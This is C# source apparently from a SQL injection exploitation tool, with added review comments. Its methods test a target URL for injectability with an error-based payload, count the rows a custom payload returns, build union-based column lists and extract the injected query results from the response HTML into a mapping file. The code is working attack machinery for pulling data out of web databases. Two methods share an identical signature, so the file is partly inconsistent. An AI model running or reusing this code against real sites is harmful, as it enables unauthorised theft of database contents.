/// <summary>
/// Runs the configured custom payload once and returns the single value extracted from the response page.
/// </summary>
/// <remarks>
/// Steps, in order: substitute each "{Position}" placeholder in <c>PayloadDetails.Payload</c> with
/// <c>PayloadHelpers.GetData(param.Name, this)</c>; when the payload is expected to yield multiple rows,
/// wrap it in the DBMS-specific limiter format; build and send the request; extract the answer from the
/// returned HTML; optionally persist the answer to the mapping file.
/// NOTE(review): <c>PayloadDetails</c> and <c>ExploitDetails</c> are dereferenced without a null check here,
/// although <c>ExploitDetails</c> is null-checked further down before the save call. Confirm which is intended.
/// </remarks>
/// <param name="startingFrom">
/// Passed as argument {1} to the limiter format string; only used when
/// <c>PayloadDetails.ExpectedResultType</c> is <c>Multiple</c>.
/// </param>
/// <returns>
/// Whatever <c>HtmlHelpers.GetAnswerFromHtml</c> extracted. The method itself tests this value for
/// null/empty, so callers should expect either.
/// </returns>
public string GetSingleCustomQueryResultRow(int startingFrom)
{
    string payloadText = PayloadDetails.Payload;

    bool hasParams = PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0;
    if (hasParams)
    {
        foreach (var param in PayloadDetails.Params)
        {
            string placeholder = "{" + param.Position + "}";
            payloadText = payloadText.Replace(placeholder, PayloadHelpers.GetData(param.Name, this));
        }
    }

    // Multi-row payloads are narrowed to one row per request via the limiter template.
    if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
    {
        string limiterFormat = PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms);
        payloadText = string.Format(limiterFormat, payloadText, startingFrom);
    }

    string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, payloadText);
    var proxy = UseProxy ? ProxyDetails : null;
    string pageHtml = QueryRunner.GetPageHtml(query, proxy);
    string answer = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

    //@TODO: strip scripts
    // NOTE(review): the answer comes from a remote response and is written to the mapping file as-is;
    // treat the stored value as untrusted content until the TODO above is resolved.
    if (string.IsNullOrEmpty(MappingFile) || string.IsNullOrEmpty(answer))
    {
        return answer;
    }

    var dbms = (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty;
    XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, answer, this, dbms);
    return answer;
}
/// <summary>
/// Sends the fixed identifier payload (<c>GeneralPayloads.ErrorBasedVictimIdentifier</c>) and reports whether
/// the value extracted from the response equals <c>GeneralPayloads.ErrorBasedVictimConfirmationResult</c>.
/// </summary>
/// <remarks>
/// NOTE(review): <c>ExploitDetails</c> is dereferenced without a null check.
/// </remarks>
/// <returns>
/// <c>true</c> only when the extracted answer is non-empty and matches the confirmation value;
/// <c>false</c> otherwise.
/// </returns>
public bool TestIfVulnerable()
{
    string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, GeneralPayloads.ErrorBasedVictimIdentifier);
    var proxy = UseProxy ? ProxyDetails : null;
    string pageHtml = QueryRunner.GetPageHtml(query, proxy);
    var answer = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

    // An empty or missing answer can never match the confirmation marker.
    if (string.IsNullOrEmpty(answer))
    {
        return false;
    }

    return answer == GeneralPayloads.ErrorBasedVictimConfirmationResult;
}
/// <summary>
/// Determines how many rows the configured custom payload would return.
/// </summary>
/// <remarks>
/// Returns early without any request when there is no payload (0) or when the payload is declared
/// single-result (1). Otherwise the payload, after placeholder substitution, is wrapped in
/// <c>GeneralPayloads.QueryResultCount</c>, sent, and the extracted answer is parsed as an integer.
/// NOTE(review): a response that cannot be parsed yields 0, which is indistinguishable from a real
/// count of zero. <c>ExploitDetails</c> is dereferenced without a null check.
/// </remarks>
/// <returns>The parsed row count; 0 when nothing is configured or the answer is not an integer.</returns>
public int GetTotalNoOfCustomQueryResultRows()
{
    if (PayloadDetails == null || string.IsNullOrEmpty(PayloadDetails.Payload))
    {
        return 0;
    }

    if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
    {
        return 1;
    }

    string payloadText = PayloadDetails.Payload;
    bool hasParams = PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0;
    if (hasParams)
    {
        foreach (var param in PayloadDetails.Params)
        {
            string placeholder = "{" + param.Position + "}";
            payloadText = payloadText.Replace(placeholder, PayloadHelpers.GetData(param.Name, this));
        }
    }

    // A UrlHelpers.HexEncodeValue(...) wrapper around this call was commented out in the original source.
    payloadText = string.Format(GeneralPayloads.QueryResultCount, payloadText);

    string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, payloadText);
    var proxy = UseProxy ? ProxyDetails : null;
    string pageHtml = QueryRunner.GetPageHtml(query, proxy);
    string countString = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

    // TryParse leaves rowCount at 0 on failure, so a failed parse returns 0.
    int rowCount;
    int.TryParse(countString, out rowCount);
    return rowCount;
}
/// <summary>
/// Determines how many rows the configured custom payload would return, placing the count expression
/// in the first position of a comma-separated column list sized by <c>_nrCols</c>.
/// </summary>
/// <remarks>
/// If any of <c>_nrCols</c>, <c>_nrVisibleCols</c> or <c>_visibleColumnIndexes</c> is zero/empty,
/// <c>TestIfVulnerable()</c> is called first and a failure aborts with <c>SqlInjException</c>. This check
/// runs before the payload guards, so it can throw even when no payload is configured.
/// NOTE(review): a response that cannot be parsed yields 0, which is indistinguishable from a real
/// count of zero. <c>ExploitDetails</c> is dereferenced without a null check.
/// </remarks>
/// <returns>
/// 0 when no payload is configured, 1 for a single-result payload, otherwise the parsed count
/// (0 when the answer is not an integer).
/// </returns>
/// <exception cref="SqlInjException">
/// Thrown when the column state is uninitialised and <c>TestIfVulnerable()</c> returns false.
/// </exception>
public int GetTotalNoOfCustomQueryResultRows()
{
    bool columnStateMissing = _nrCols == 0 || _nrVisibleCols == 0 || _visibleColumnIndexes.Count() == 0;
    if (columnStateMissing && !TestIfVulnerable())
    {
        throw new SqlInjException("Given script is not injectable using current injection strategy");
    }

    if (PayloadDetails == null || string.IsNullOrEmpty(PayloadDetails.Payload))
    {
        return 0;
    }

    if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
    {
        return 1;
    }

    string payloadText = PayloadDetails.Payload;
    bool hasParams = PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0;
    if (hasParams)
    {
        foreach (var param in PayloadDetails.Params)
        {
            string placeholder = "{" + param.Position + "}";
            payloadText = payloadText.Replace(placeholder, PayloadHelpers.GetData(param.Name, this));
        }
    }

    payloadText = string.Format(GeneralPayloads.QueryResultCount, payloadText);

    StringBuilder columnList = new StringBuilder();
    columnList.AppendFormat(GeneralPayloads.UnionBasedSelectResultWrapper, payloadText);

    // Pad the remaining _nrCols - 1 positions with their ordinals: ",1,2,...".
    // Emitting the separator before each ordinal gives the same text as the
    // original's "leading comma, then comma between items" logic.
    for (int col = 1; col < _nrCols; col++)
    {
        columnList.Append(",");
        columnList.Append(col.ToString());
    }

    string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, columnList.ToString());
    var proxy = UseProxy ? ProxyDetails : null;
    string pageHtml = QueryRunner.GetPageHtml(query, proxy);
    var answer = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

    // TryParse leaves rowCount at 0 on failure, so a failed parse returns 0.
    int rowCount;
    int.TryParse(answer, out rowCount);
    return rowCount;
}